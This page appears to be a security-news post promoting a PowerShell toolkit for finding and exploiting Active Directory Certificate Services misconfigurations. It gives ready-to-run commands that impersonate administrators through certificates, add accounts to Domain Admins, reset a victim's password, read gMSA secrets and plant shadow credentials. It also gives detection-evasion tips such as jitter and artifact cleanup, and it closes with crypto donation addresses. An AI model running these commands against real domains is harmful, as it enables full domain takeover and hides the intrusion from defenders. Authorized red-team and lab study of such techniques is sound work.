Living Off The Registry: Master AD CS Enumeration with the Native LOLBAS Toolkit

AD CS LOLBAS Toolkit

Native Windows toolkit for AD CS enumeration and exploitation. Everything runs through built-in OS components (certreq.exe, certutil.exe, PowerShell AD module, .NET Framework) – no third-party tools needed(other than RSAT). Build with a sprinkle of FAFO and some finding out in lab env.

Scripts

Enumeration

Invoke-Enumerate.ps1 – Scans for ESC1 through ESC13 conditions across templates, CA config, HTTP endpoints, and certificate binding enforcement. Outputs ready-to-run exploitation commands with discovered template names.

Invoke-SnapshotAudit.ps1 – Offline AD CS audit against ADExplorer .dat snapshots. Parses the binary snapshot format directly (no external dependencies, no domain connectivity). Checks for ESC1, ESC2, ESC3, ESC4, ESC9, and ESC13. Enumerates high-value target groups (Domain Admins, Enterprise Admins, etc.) and generates ready-to-run Invoke-ESC* commands.

[pastacode lang=”bash” manual=”%23%20Full%20audit%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%0A%0A%23%20Vulnerable%20templates%20only%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%20-VulnerableOnly%0A%0A%23%20Interactive%20mode%20-%20pick%20a%20target%20from%20discovered%20Domain%20Admins%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%20-List%0A%0A%23%20Specify%20target%20user%20for%20commands%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%20-Target%20administrator%0A%0A%23%20Export%20to%20files%0A.%5CInvoke-SnapshotAudit.ps1%20-SnapshotPath%20.%5Csnapshot.dat%20-OutputFile%20report.txt%20-CsvFile%20results.csv” message=”” highlight=”” provider=”manual”/]

ESC Exploitation

Each ESC script follows the same pattern: reconnaissance, certificate request, verification, then pass-the-cert authentication. Common parameters across most scripts:

Parameter Description
-CAConfig CA config string, e.g. "polaris.zsec.red\corp-DC01-CA"
-TemplateName Vulnerable template name
-TargetUPN UPN to impersonate, e.g. "administrator@zsec.red"
-PFXPassword PFX export password (auto-generated if omitted)
-OutputDir Artifact output directory (default: $env:TEMP\adcs-ops)
-AuthMethod SchannelPKINIT, or Both (default)
-DCTarget DC FQDN (auto-detected if omitted)
-SkipAuth Skip the authentication stage, just get the cert

Post-Exploitation

Invoke-PassTheCert.ps1 – Authenticates to LDAP using a PFX certificate and performs post-exploitation operations. Includes an interactive LDAP shell with 70+ commands.

[pastacode lang=”markup” manual=”%23%20Verify%20identity%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20Whoami%0A%0A%23%20Interactive%20LDAP%20shell%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20LdapShell%0A%0A%23%20Direct%20actions%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20AddGroupMember%20-TargetDN%20%22CN%3DDomain%20Admins%2CCN%3DUsers%2CDC%3Dzsec%2CDC%3Dred%22%20-PrincipalDN%20%22CN%3Djsmith%2CCN%3DUsers%2CDC%3Dzsec%2CDC%3Dred%22%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20SetRBCD%20-TargetDN%20%22CN%3DSERVER%24%2CCN%3DComputers%2CDC%3Dzsec%2CDC%3Dred%22%20-PrincipalDN%20%22CN%3DATTACKER%24%2CCN%3DComputers%2CDC%3Dzsec%2CDC%3Dred%22%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20ResetPassword%20-TargetDN%20%22CN%3Dvictim%2CCN%3DUsers%2CDC%3Dzsec%2CDC%3Dred%22%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20ReadGMSA%20-TargetDN%20%22svc_account%24%22%0A.%5CInvoke-PassTheCert.ps1%20-PFXFile%20cert.pfx%20-PFXPassword%20%22pass%22%20-Action%20ShadowCred%20-TargetDN%20%22DC01%24%22″ message=”” highlight=”” provider=”manual”/]

LdapShell commands include: usergroupcomputeradminsdaseasspnsasrepunconstrainedconstraineddelegationsrbcdgmsalapstrustsgposoustemplatescasenrollcheckkerberoastaclservicemapdnsrecords, and action commands like adduseradddaaddcomputerpasswdaddmembershadowcredsetrbcdsetdcsyncwritedacldnsadd, and more. Type help in the shell for the full list.

Invoke-ShadowCredentials.ps1 – Standalone shadow credentials attack using the current user’s domain context (no certificate needed). Adds, lists, or removes msDS-KeyCredentialLink values.

OPSEC Notes

Several scripts support options to reduce detection footprint:

  • -Delay / -Jitter on DomainRecon adds random sleep between operations to avoid rate-based detection (MDI, etc.)
  • delay command in LdapShell does the same for interactive queries
  • -SkipHTTP on Enumerate avoids network connections to CA web endpoints
  • cleanup in LdapShell removes temp artifacts from %TEMP% (PFX files, hashes, reports)
  • ESC7 check in Enumerate now uses LDAP instead of certutil -getreg where possible. ESC6 and ESC11 still require certutil (registry values with no LDAP equivalent)
  • Shadow credential commands always print cleanup reminders with the exact removal command

Artifacts are written to %TEMP%\adcs-ops\ by default. Clean up after yourself.

Download

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Crypto QR Code
USDT (TRC20):
TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm
USDT (ERC20):
0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce